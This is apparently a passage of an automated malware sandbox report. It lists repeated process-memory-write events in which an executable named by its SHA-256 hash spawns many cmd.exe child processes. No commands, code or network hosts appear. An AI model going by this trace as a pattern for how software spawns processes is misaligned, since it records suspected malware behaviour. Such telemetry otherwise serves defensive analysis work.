8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 309 PID 2196 wrote to memory of 4108 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 309 PID 2196 wrote to memory of 4108 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 309 PID 4108 wrote to memory of 5116 4108 cmd.exe 311 PID 4108 wrote to memory of 5116 4108 cmd.exe 311 PID 4108 wrote to memory of 5116 4108 cmd.exe 311 PID 4108 wrote to memory of 2732 4108 cmd.exe 312 PID 4108 wrote to memory of 2732 4108 cmd.exe 312 PID 4108 wrote to memory of 2732 4108 cmd.exe 312 PID 4108 wrote to memory of 4436 4108 cmd.exe 313 PID 4108 wrote to memory of 4436 4108 cmd.exe 313 PID 4108 wrote to memory of 4436 4108 cmd.exe 313 PID 4436 wrote to memory of 5112 4436 cmd.exe 314 PID 4436 wrote to memory of 5112 4436 cmd.exe 314 PID 4436 wrote to memory of 5112 4436 cmd.exe 314 PID 4108 wrote to memory of 4384 4108 cmd.exe 315 PID 4108 wrote to memory of 4384 4108 cmd.exe 315 PID 4108 wrote to memory of 4384 4108 cmd.exe 315 PID 2196 wrote to memory of 4720 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 316 PID 2196 wrote to memory of 4720 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 316 PID 2196 wrote to memory of 4720 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 316 PID 4720 wrote to memory of 4804 4720 cmd.exe 318 PID 4720 wrote to memory of 4804 4720 cmd.exe 318 PID 4720 wrote to memory of 4804 4720 cmd.exe 318 PID 4720 wrote to memory of 1660 4720 cmd.exe 319 PID 4720 wrote to memory of 1660 4720 cmd.exe 319 PID 4720 wrote to memory of 1660 4720 cmd.exe 319 PID 4720 wrote to memory of 4836 4720 cmd.exe 320 PID 4720 wrote to memory of 4836 4720 cmd.exe 320 PID 4720 wrote to memory of 4836 4720 cmd.exe 320 PID 4836 wrote to memory of 5100 4836 cmd.exe 321 PID 4836 wrote to memory of 5100 4836 cmd.exe 321 PID 4836 wrote to memory of 5100 4836 cmd.exe 321 PID 4720 wrote to memory of 272 4720 cmd.exe 322 PID 4720 wrote to memory of 272 4720 cmd.exe 322 PID 4720 wrote to memory of 272 4720 cmd.exe 322 PID 2196 wrote to memory of 3172 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 323 PID 2196 wrote to memory of 3172 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 323 PID 2196 wrote to memory of 3172 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 323 PID 3172 wrote to memory of 5104 3172 cmd.exe 325 PID 3172 wrote to memory of 5104 3172 cmd.exe 325 PID 3172 wrote to memory of 5104 3172 cmd.exe 325 PID 3172 wrote to memory of 268 3172 cmd.exe 326 PID 3172 wrote to memory of 268 3172 cmd.exe 326 PID 3172 wrote to memory of 268 3172 cmd.exe 326 PID 3172 wrote to memory of 856 3172 cmd.exe 327 PID 3172 wrote to memory of 856 3172 cmd.exe 327 PID 3172 wrote to memory of 856 3172 cmd.exe 327 PID 856 wrote to memory of 4136 856 cmd.exe 328 PID 856 wrote to memory of 4136 856 cmd.exe 328 PID 856 wrote to memory of 4136 856 cmd.exe 328 PID 3172 wrote to memory of 5136 3172 cmd.exe 329 PID 3172 wrote to memory of 5136 3172 cmd.exe 329 PID 3172 wrote to memory of 5136 3172 cmd.exe 329 PID 2196 wrote to memory of 5160 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 330 PID 2196 wrote to memory of 5160 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 330 PID 2196 wrote to memory of 5160 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 330 PID 5160 wrote to memory of 5208 5160 cmd.exe 332 PID 5160 wrote to memory of 5208 5160 cmd.exe 332 PID 5160 wrote to memory of 5208 5160 cmd.exe 332 PID 5160 wrote to memory of 5228 5160 cmd.exe 333 PID 5160 wrote to memory of 5228 5160 cmd.exe 333 PID 5160 wrote to memory of 5228 5160 cmd.exe 333 PID 5160 wrote to memory of 5248 5160 cmd.exe 334 PID 5160 wrote to memory of 5248 5160 cmd.exe 334 PID 5160 wrote to memory of 5248 5160 cmd.exe 334 PID 5248 wrote to memory of 5264 5248 cmd.exe 335 PID 5248 wrote to memory of 5264 5248 cmd.exe 335 PID 5248 wrote to memory of 5264 5248 cmd.exe 335 PID 5160 wrote to memory of 5288 5160 cmd.exe 336 PID 5160 wrote to memory of 5288 5160 cmd.exe 336 PID 5160 wrote to memory of 5288 5160 cmd.exe 336 PID 2196 wrote to memory of 5312 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 337 PID 2196 wrote to memory of 5312 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 337 PID 2196 wrote to memory of 5312 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 337 PID 5312 wrote to memory of 5360 5312 cmd.exe 339 PID 5312 wrote to memory of 5360 5312 cmd.exe 339 PID 5312 wrote to memory of 5360 5312 cmd.exe 339 PID 5312 wrote to memory of 5380 5312 cmd.exe 340 PID 5312 wrote to memory of 5380 5312 cmd.exe 340 PID 5312 wrote to memory of 5380 5312 cmd.exe 340 PID 5312 wrote to memory of 5400 5312 cmd.exe 341 PID 5312 wrote to memory of 5400 5312 cmd.exe 341 PID 5312 wrote to memory of 5400 5312 cmd.exe 341 PID 5400 wrote to memory of 5416 5400 cmd.exe 342 PID 5400 wrote to memory of 5416 5400 cmd.exe 342 PID 5400 wrote to memory of 5416 5400 cmd.exe 342 PID 5312 wrote to memory of 5440 5312 cmd.exe 343 PID 5312 wrote to memory of 5440 5312 cmd.exe 343 PID 5312 wrote to memory of 5440 5312 cmd.exe 343 PID 2196 wrote to memory of 5464 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 344 PID 2196 wrote to memory of 5464 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 344 PID 2196 wrote to memory of 5464 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 344 PID 5464 wrote to memory of 5512 5464 cmd.exe 346 PID 5464 wrote to memory of 5512 5464 cmd.exe 346 PID 5464 wrote to memory of 5512 5464 cmd.exe 346 PID 5464 wrote to memory of 5532 5464 cmd.exe 347 PID 5464 wrote to memory of 5532 5464 cmd.exe 347 PID 5464 wrote to memory of 5532 5464 cmd.exe 347 PID 5464 wrote to memory of 5552 5464 cmd.exe 348 PID 5464 wrote to memory of 5552 5464 cmd.exe 348 PID 5464 wrote to memory of 5552 5464 cmd.exe 348 PID 5552 wrote to memory of 5568 5552 cmd.exe 349 PID 5552 wrote to memory of 5568 5552 cmd.exe 349 PID 5552 wrote to memory of 5568 5552 cmd.exe 349 PID 5464 wrote to memory of 5592 5464 cmd.exe 350 PID 5464 wrote to memory of 5592 5464 cmd.exe 350 PID 5464 wrote to memory of 5592 5464 cmd.exe 350 PID 2196 wrote to memory of 5616 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 351 PID 2196 wrote to memory of 5616 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 351 PID 2196 wrote to memory of 5616 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 351 PID 5616 wrote to memory of 5664 5616 cmd.exe 353 PID 5616 wrote to memory of 5664 5616 cmd.exe 353 PID 5616 wrote to memory of 5664 5616 cmd.exe 353 PID 5616 wrote to memory of 5684 5616 cmd.exe 354 PID 5616 wrote to memory of 5684 5616 cmd.exe 354 PID 5616 wrote to memory of 5684 5616 cmd.exe 354 PID 5616 wrote to memory of 5704 5616 cmd.exe 355 PID 5616 wrote to memory of 5704 5616 cmd.exe 355 PID 5616 wrote to memory of 5704 5616 cmd.exe 355 PID 5704 wrote to memory of 5720 5704 cmd.exe 356 PID 5704 wrote to memory of 5720 5704 cmd.exe 356 PID 5704 wrote to memory of 5720 5704 cmd.exe 356 PID 5616 wrote to memory of 5744 5616 cmd.exe 357 PID 5616 wrote to memory of 5744 5616 cmd.exe 357 PID 5616 wrote to memory of 5744 5616 cmd.exe 357 PID 2196 wrote to memory of 5768 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 358 PID 2196 wrote to memory of 5768 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 358 PID 2196 wrote to memory of 5768 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 358 PID 5768 wrote to memory of 5816 5768 cmd.exe 360 PID 5768 wrote to memory of 5816 5768 cmd.exe 360 PID 5768 wrote to memory of 5816 5768 cmd.exe 360 PID 5768 wrote to memory of 5836 5768 cmd.exe 361 PID 5768 wrote to memory of 5836 5768 cmd.exe 361 PID 5768 wrote to memory of 5836 5768 cmd.exe 361 PID 5768 wrote to memory of 5856 5768 cmd.exe 362 PID 5768 wrote to memory of 5856 5768 cmd.exe 362 PID 5768 wrote to memory of 5856 5768 cmd.exe 362 PID 5856 wrote to memory of 5872 5856 cmd.exe 363 PID 5856 wrote to memory of 5872 5856 cmd.exe 363 PID 5856 wrote to memory of 5872 5856 cmd.exe 363 PID 5768 wrote to memory of 5896 5768 cmd.exe 364 PID 5768 wrote to memory of 5896 5768 cmd.exe 364 PID 5768 wrote to memory of 5896 5768 cmd.exe 364 PID 2196 wrote to memory of 5920 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 365 PID 2196 wrote to memory of 5920 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 365 PID 2196 wrote to memory of 5920 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 365 PID 5920 wrote to memory of 5968 5920 cmd.exe 367 PID 5920 wrote to memory of 5968 5920 cmd.exe 367 PID 5920 wrote to memory of 5968 5920 cmd.exe 367 PID 5920 wrote to memory of 5988 5920 cmd.exe 368 PID 5920 wrote to memory of 5988 5920 cmd.exe 368 PID 5920 wrote to memory of 5988 5920 cmd.exe 368 PID 5920 wrote to memory of 6008 5920 cmd.exe 369 PID 5920 wrote to memory of 6008 5920 cmd.exe 369 PID 5920 wrote to memory of 6008 5920 cmd.exe 369 PID 6008 wrote to memory of 6024 6008 cmd.exe 370 PID 6008 wrote to memory of 6024 6008 cmd.exe 370 PID 6008 wrote to memory of 6024 6008 cmd.exe 370 PID 5920 wrote to memory of 6048 5920 cmd.exe 371 PID 5920 wrote to memory of 6048 5920 cmd.exe 371 PID 5920 wrote to memory of 6048 5920 cmd.exe 371 PID 2196 wrote to memory of 6072 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 372 PID 2196 wrote to memory of 6072 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 372 PID 2196 wrote to memory of 6072 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 372 PID 6072 wrote to memory of 6120 6072 cmd.exe 374 PID 6072 wrote to memory of 6120 6072 cmd.exe 374 PID 6072 wrote to memory of 6120 6072 cmd.exe 374 PID 6072 wrote to memory of 6140 6072 cmd.exe 375 PID 6072 wrote to memory of 6140 6072 cmd.exe 375 PID 6072 wrote to memory of 6140 6072 cmd.exe 375 PID 6072 wrote to memory of 4940 6072 cmd.exe 376 PID 6072 wrote to memory of 4940 6072 cmd.exe 376 PID 6072 wrote to memory of 4940 6072 cmd.exe 376 PID 4940 wrote to memory of 5148 4940 cmd.exe 377 PID 4940 wrote to memory of 5148 4940 cmd.exe 377 PID 4940 wrote to memory of 5148 4940 cmd.exe 377 PID 6072 wrote to memory of 4656 6072 cmd.exe 378 PID 6072 wrote to memory of 4656 6072 cmd.exe 378 PID 6072 wrote to memory of 4656 6072 cmd.exe 378 PID 2196 wrote to memory of 5168 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 379 PID 2196 wrote to memory of 5168 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 379 PID 2196 wrote to memory of 5168 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 379 PID 5168 wrote to memory of 5276 5168 cmd.exe 381 PID 5168 wrote to memory of 5276 5168 cmd.exe 381 PID 5168 wrote to memory of 5276 5168 cmd.exe 381 PID 5168 wrote to memory of 5252 5168 cmd.exe 382 PID 5168 wrote to memory of 5252 5168 cmd.exe 382 PID 5168 wrote to memory of 5252 5168 cmd.exe 382 PID 5168 wrote to memory of 5292 5168 cmd.exe 383 PID 5168 wrote to memory of 5292 5168 cmd.exe 383 PID 5168 wrote to memory of 5292 5168 cmd.exe 383 PID 5292 wrote to memory of 5192 5292 cmd.exe 384 PID 5292 wrote to memory of 5192 5292 cmd.exe 384 PID 5292 wrote to memory of 5192 5292 cmd.exe 384 PID 5168 wrote to memory of 5320 5168 cmd.exe 385 PID 5168 wrote to memory of 5320 5168 cmd.exe 385 PID 5168 wrote to memory of 5320 5168 cmd.exe 385 PID 2196 wrote to memory of 5388 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 386 PID 2196 wrote to memory of 5388 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 386 PID 2196 wrote to memory of 5388 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 386 PID 5388 wrote to memory of 5448 5388 cmd.exe 388 PID 5388 wrote to memory of 5448 5388 cmd.exe 388 PID 5388 wrote to memory of 5448 5388 cmd.exe 388 PID 5388 wrote to memory of 5356 5388 cmd.exe 389 PID 5388 wrote to memory of 5356 5388 cmd.exe 389 PID 5388 wrote to memory of 5356 5388 cmd.exe 389 PID 5388 wrote to memory of 5336 5388 cmd.exe 390 PID 5388 wrote to memory of 5336 5388 cmd.exe 390 PID 5388 wrote to memory of 5336 5388 cmd.exe 390 PID 5336 wrote to memory of 5472 5336 cmd.exe 391 PID 5336 wrote to memory of 5472 5336 cmd.exe 391 PID 5336 wrote to memory of 5472 5336 cmd.exe 391 PID 5388 wrote to memory of 5540 5388 cmd.exe 392 PID 5388 wrote to memory of 5540 5388 cmd.exe 392 PID 5388 wrote to memory of 5540 5388 cmd.exe 392 PID 2196 wrote to memory of 5580 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 393 PID 2196 wrote to memory of 5580 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 393 PID 2196 wrote to memory of 5580 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 393 PID 5580 wrote to memory of 5508 5580 cmd.exe 395 PID 5580 wrote to memory of 5508 5580 cmd.exe 395 PID 5580 wrote to memory of 5508 5580 cmd.exe 395 PID 5580 wrote to memory of 5484 5580 cmd.exe 396 PID 5580 wrote to memory of 5484 5580 cmd.exe 396 PID 5580 wrote to memory of 5484 5580 cmd.exe 396 PID 5580 wrote to memory of 5672 5580 cmd.exe 397 PID 5580 wrote to memory of 5672 5580 cmd.exe 397 PID 5580 wrote to memory of 5672 5580 cmd.exe 397 PID 5672 wrote to memory of 5692 5672 cmd.exe 398 PID 5672 wrote to memory of 5692 5672 cmd.exe 398 PID 5672 wrote to memory of 5692 5672 cmd.exe 398 PID 5580 wrote to memory of 5724 5580 cmd.exe 399 PID 5580 wrote to memory of 5724 5580 cmd.exe 399 PID 5580 wrote to memory of 5724 5580 cmd.exe 399 PID 2196 wrote to memory of 5752 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 400 PID 2196 wrote to memory of 5752 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 400 PID 2196 wrote to memory of 5752 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 400 PID 5752 wrote to memory of 5636 5752 cmd.exe 402 PID 5752 wrote to memory of 5636 5752 cmd.exe 402 PID 5752 wrote to memory of 5636 5752 cmd.exe 402 PID 5752 wrote to memory of 5828 5752 cmd.exe 403 PID 5752 wrote to memory of 5828 5752 cmd.exe 403 PID 5752 wrote to memory of 5828 5752 cmd.exe 403 PID 5752 wrote to memory of 5840 5752 cmd.exe 404 PID 5752 wrote to memory of 5840 5752 cmd.exe 404 PID 5752 wrote to memory of 5840 5752 cmd.exe 404 PID 5840 wrote to memory of 5884 5840 cmd.exe 405 PID 5840 wrote to memory of 5884 5840 cmd.exe 405 PID 5840 wrote to memory of 5884 5840 cmd.exe 405 PID 5752 wrote to memory of 5904 5752 cmd.exe 406 PID 5752 wrote to memory of 5904 5752 cmd.exe 406 PID 5752 wrote to memory of 5904 5752 cmd.exe 406 PID 2196 wrote to memory of 5808 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 407 PID 2196 wrote to memory of 5808 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 407 PID 2196 wrote to memory of 5808 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 407 PID 5808 wrote to memory of 5972 5808 cmd.exe 409 PID 5808 wrote to memory of 5972 5808 cmd.exe 409 PID 5808 wrote to memory of 5972 5808 cmd.exe 409 PID 5808 wrote to memory of 6000 5808 cmd.exe 410 PID 5808 wrote to memory of 6000 5808 cmd.exe 410 PID 5808 wrote to memory of 6000 5808 cmd.exe 410 PID 5808 wrote to memory of 6040 5808 cmd.exe 411 PID 5808 wrote to memory of 6040 5808 cmd.exe 411 PID 5808 wrote to memory of 6040 5808 cmd.exe 411 PID 6040 wrote to memory of 6056 6040 cmd.exe 412 PID 6040 wrote to memory of 6056 6040 cmd.exe 412 PID 6040 wrote to memory of 6056 6040 cmd.exe 412 PID 5808 wrote to memory of 5960 5808 cmd.exe 413 PID 5808 wrote to memory of 5960 5808 cmd.exe 413 PID 5808 wrote to memory of 5960 5808 cmd.exe 413 PID 2196 wrote to memory of 5940 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 414 PID 2196 wrote to memory of 5940 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 414 PID 2196 wrote to memory of 5940 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 414 PID 5940 wrote to memory of 4388 5940 cmd.exe 416 PID 5940 wrote to memory of 4388 5940 cmd.exe 416 PID 5940 wrote to memory of 4388 5940 cmd.exe 416 PID 5940 wrote to memory of 5156 5940 cmd.exe 417 PID 5940 wrote to memory of 5156 5940 cmd.exe 417 PID 5940 wrote to memory of 5156 5940 cmd.exe 417 PID 5940 wrote to memory of 4872 5940 cmd.exe 418 PID 5940 wrote to memory of 4872 5940 cmd.exe 418 PID 5940 wrote to memory of 4872 5940 cmd.exe 418 PID 4872 wrote to memory of 6116 4872 cmd.exe 419 PID 4872 wrote to memory of 6116 4872 cmd.exe 419 PID 4872 wrote to memory of 6116 4872 cmd.exe 419 PID 5940 wrote to memory of 6108 5940 cmd.exe 420 PID 5940 wrote to memory of 6108 5940 cmd.exe 420 PID 5940 wrote to memory of 6108 5940 cmd.exe 420 PID 2196 wrote to memory of 5260 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 421 PID 2196 wrote to memory of 5260 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 421 PID 2196 wrote to memory of 5260 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 421 PID 5260 wrote to memory of 5164 5260 cmd.exe 423 PID 5260 wrote to memory of 5164 5260 cmd.exe 423 PID 5260 wrote to memory of 5164 5260 cmd.exe 423 PID 5260 wrote to memory of 5364 5260 cmd.exe 424 PID 5260 wrote to memory of 5364 5260 cmd.exe 424 PID 5260 wrote to memory of 5364 5260 cmd.exe 424 PID 5260 wrote to memory of 5232 5260 cmd.exe 425 PID 5260 wrote to memory of 5232 5260 cmd.exe 425 PID 5260 wrote to memory of 5232 5260 cmd.exe 425 PID 5232 wrote to memory of 5240 5232 cmd.exe 426 PID 5232 wrote to memory of 5240 5232 cmd.exe 426 PID 5232 wrote to memory of 5240 5232 cmd.exe 426 PID 5260 wrote to memory of 5444 5260 cmd.exe 427 PID 5260 wrote to memory of 5444 5260 cmd.exe 427 PID 5260 wrote to memory of 5444 5260 cmd.exe 427 PID 2196 wrote to memory of 5352 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 428 PID 2196 wrote to memory of 5352 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 428 PID 2196 wrote to memory of 5352 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 428 PID 5352 wrote to memory of 5560 5352 cmd.exe 430 PID 5352 wrote to memory of 5560 5352 cmd.exe 430 PID 5352 wrote to memory of 5560 5352 cmd.exe 430 PID 5352 wrote to memory of 5432 5352 cmd.exe 431 PID 5352 wrote to memory of 5432 5352 cmd.exe 431 PID 5352 wrote to memory of 5432 5352 cmd.exe 431 PID 5352 wrote to memory of 5392 5352 cmd.exe 432 PID 5352 wrote to memory of 5392 5352 cmd.exe 432 PID 5352 wrote to memory of 5392 5352 cmd.exe 432 PID 5392 wrote to memory of 5500 5392 cmd.exe 433 PID 5392 wrote to memory of 5500 5392 cmd.exe 433 PID 5392 wrote to memory of 5500 5392 cmd.exe 433 PID 5352 wrote to memory of 5624 5352 cmd.exe 434 PID 5352 wrote to memory of 5624 5352 cmd.exe 434 PID 5352 wrote to memory of 5624 5352 cmd.exe 434 PID 2196 wrote to memory of 5728 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 435 PID 2196 wrote to memory of 5728 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 435 PID 2196 wrote to memory of 5728 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 435 PID 5728 wrote to memory of 5556 5728 cmd.exe 437 PID 5728 wrote to memory of 5556 5728 cmd.exe 437 PID 5728 wrote to memory of 5556 5728 cmd.exe 437 PID 5728 wrote to memory of 5764 5728 cmd.exe 438 PID 5728 wrote to memory of 5764 5728 cmd.exe 438 PID 5728 wrote to memory of 5764 5728 cmd.exe 438 PID 5728 wrote to memory of 5628 5728 cmd.exe 439 PID 5728 wrote to memory of 5628 5728 cmd.exe 439 PID 5728 wrote to memory of 5628 5728 cmd.exe 439 PID 5628 wrote to memory of 5820 5628 cmd.exe 440 PID 5628 wrote to memory of 5820 5628 cmd.exe 440 PID 5628 wrote to memory of 5820 5628 cmd.exe 440 PID 5728 wrote to memory of 5892 5728 cmd.exe 441 PID 5728 wrote to memory of 5892 5728 cmd.exe 441 PID 5728 wrote to memory of 5892 5728 cmd.exe 441 PID 2196 wrote to memory of 5812 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 442 PID 2196 wrote to memory of 5812 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 442 PID 2196 wrote to memory of 5812 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 442 PID 5812 wrote to memory of 5800 5812 cmd.exe 444 PID 5812 wrote to memory of 5800 5812 cmd.exe 444 PID 5812 wrote to memory of 5800 5812 cmd.exe 444 PID 5812 wrote to memory of 5992 5812 cmd.exe 445 PID 5812 wrote to memory of 5992 5812 cmd.exe 445 PID 5812 wrote to memory of 5992 5812 cmd.exe 445 PID 5812 wrote to memory of 6012 5812 cmd.exe 446 PID 5812 wrote to memory of 6012 5812 cmd.exe 446 PID 5812 wrote to memory of 6012 5812 cmd.exe 446 PID 6012 wrote to memory of 6052 6012 cmd.exe 447 PID 6012 wrote to memory of 6052 6012 cmd.exe 447 PID 6012 wrote to memory of 6052 6012 cmd.exe 447 PID 5812 wrote to memory of 5956 5812 cmd.exe 448 PID 5812 wrote to memory of 5956 5812 cmd.exe 448 PID 5812 wrote to memory of 5956 5812 cmd.exe 448 PID 2196 wrote to memory of 5796 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 449 PID 2196 wrote to memory of 5796 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 449 PID 2196 wrote to memory of 5796 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 449 PID 5796 wrote to memory of 3056 5796 cmd.exe 451 PID 5796 wrote to memory of 3056 5796 cmd.exe 451 PID 5796 wrote to memory of 3056 5796 cmd.exe 451 PID 5796 wrote to memory of 6100 5796 cmd.exe 452 PID 5796 wrote to memory of 6100 5796 cmd.exe 452 PID 5796 wrote to memory of 6100 5796 cmd.exe 452 PID 5796 wrote to memory of 1380 5796 cmd.exe 453 PID 5796 wrote to memory of 1380 5796 cmd.exe 453 PID 5796 wrote to memory of 1380 5796 cmd.exe 453 PID 1380 wrote to memory of 5284 1380 cmd.exe 454 PID 1380 wrote to memory of 5284 1380 cmd.exe 454 PID 1380 wrote to memory of 5284 1380 cmd.exe 454 PID 5796 wrote to memory of 6136 5796 cmd.exe 455 PID 5796 wrote to memory of 6136 5796 cmd.exe 455 PID 5796 wrote to memory of 6136 5796 cmd.exe 455 PID 2196 wrote to memory of 5268 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 456 PID 2196 wrote to memory of 5268 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 456 PID 2196 wrote to memory of 5268 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 456 PID 5268 wrote to memory of 5384 5268 cmd.exe 458 PID 5268 wrote to memory of 5384 5268 cmd.exe 458 PID 5268 wrote to memory of 5384 5268 cmd.exe 458 PID 5268 wrote to memory of 5244 5268 cmd.exe 459 PID 5268 wrote to memory of 5244 5268 cmd.exe 459 PID 5268 wrote to memory of 5244 5268 cmd.exe 459 PID 5268 wrote to memory of 5452 5268 cmd.exe 460 PID 5268 wrote to memory of 5452 5268 cmd.exe 460 PID 5268 wrote to memory of 5452 5268 cmd.exe 460 PID 5452 wrote to memory of 5184 5452 cmd.exe 461 PID 5452 wrote to memory of 5184 5452 cmd.exe 461 PID 5452 wrote to memory of 5184 5452 cmd.exe 461 PID 5268 wrote to memory of 5520 5268 cmd.exe 462 PID 5268 wrote to memory of 5520 5268 cmd.exe 462 PID 5268 wrote to memory of 5520 5268 cmd.exe 462 PID 2196 wrote to memory of 5420 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 463 PID 2196 wrote to memory of 5420 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 463 PID 2196 wrote to memory of 5420 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 463 PID 5420 wrote to memory of 5696 5420 cmd.exe 465 PID 5420 wrote to memory of 5696 5420 cmd.exe 465 PID 5420 wrote to memory of 5696 5420 cmd.exe 465 PID 5420 wrote to memory of 5324 5420 cmd.exe 466 PID 5420 wrote to memory of 5324 5420 cmd.exe 466 PID 5420 wrote to memory of 5324 5420 cmd.exe 466 PID 5420 wrote to memory of 5524 5420 cmd.exe 467 PID 5420 wrote to memory of 5524 5420 cmd.exe 467 PID 5420 wrote to memory of 5524 5420 cmd.exe 467 PID 5524 wrote to memory of 5680 5524 cmd.exe 468 PID 5524 wrote to memory of 5680 5524 cmd.exe 468 PID 5524 wrote to memory of 5680 5524 cmd.exe 468 PID 5420 wrote to memory of 5776 5420 cmd.exe 469 PID 5420 wrote to memory of 5776 5420 cmd.exe 469 PID 5420 wrote to memory of 5776 5420 cmd.exe 469 PID 2196 wrote to memory of 5888 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 470 PID 2196 wrote to memory of 5888 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 470 PID 2196 wrote to memory of 5888 2196 